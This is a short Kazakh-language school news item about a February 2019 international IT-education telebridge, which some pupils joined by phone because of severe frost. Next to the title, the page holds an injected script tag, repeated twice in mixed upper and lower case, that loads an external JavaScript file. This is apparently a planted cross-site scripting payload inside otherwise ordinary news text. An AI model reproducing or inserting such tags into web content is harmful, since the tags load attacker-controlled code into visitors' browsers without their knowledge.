ІТ-сыныптар бойынша телекөпір<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.02.2019

2019 жылдың 7 ақпан күні  "НұрОтан" партиясының ұйымдастыруымен ІТ-оқыту бойынша халықаралық телекөпір өтті. Трансляция біздің еліміздің  ІТ-оқушыларымен Калифорния штатының профессорлары мен студенттері арасында жүргізілді. Телекөпір  facebook.com./nurotan.kz сайтында сағат 11:00-мен  13:00 аралығында болды. Баратай НМ оқушылары,  өкінішке орай бүгінгі ауа райының күрт өзгеруіне байланысты, мектептің қабырғасында осы шараны тамашала алмады (актіленген күн-қатты аяз). Бірақ кейбір оқушылар бұл телекөпірге өздерінің мобильді телефондары арқылы  онлайнға шығып қатыса алды. Бұл оқушыларымыздың ІТ-оқытуға деген қызығушылықтары мол екені көрсетті. Телекөпірдің барысында ІТ-оқытудағы жаңа технологиялар, заманауи бағдарламалар, шетел мемлекеттердегі тәжірибе туралы айтылды. Бұл телекөпірдің ұйымдастырылуы қазіргі кезде қажеттілігі мол болды және біздің оқушыларымызға ІТ-оқытудағы үлкен үәжін берді.

Просмотров: 746


Пікір қосу



Деректерді қолтаңбаға қосу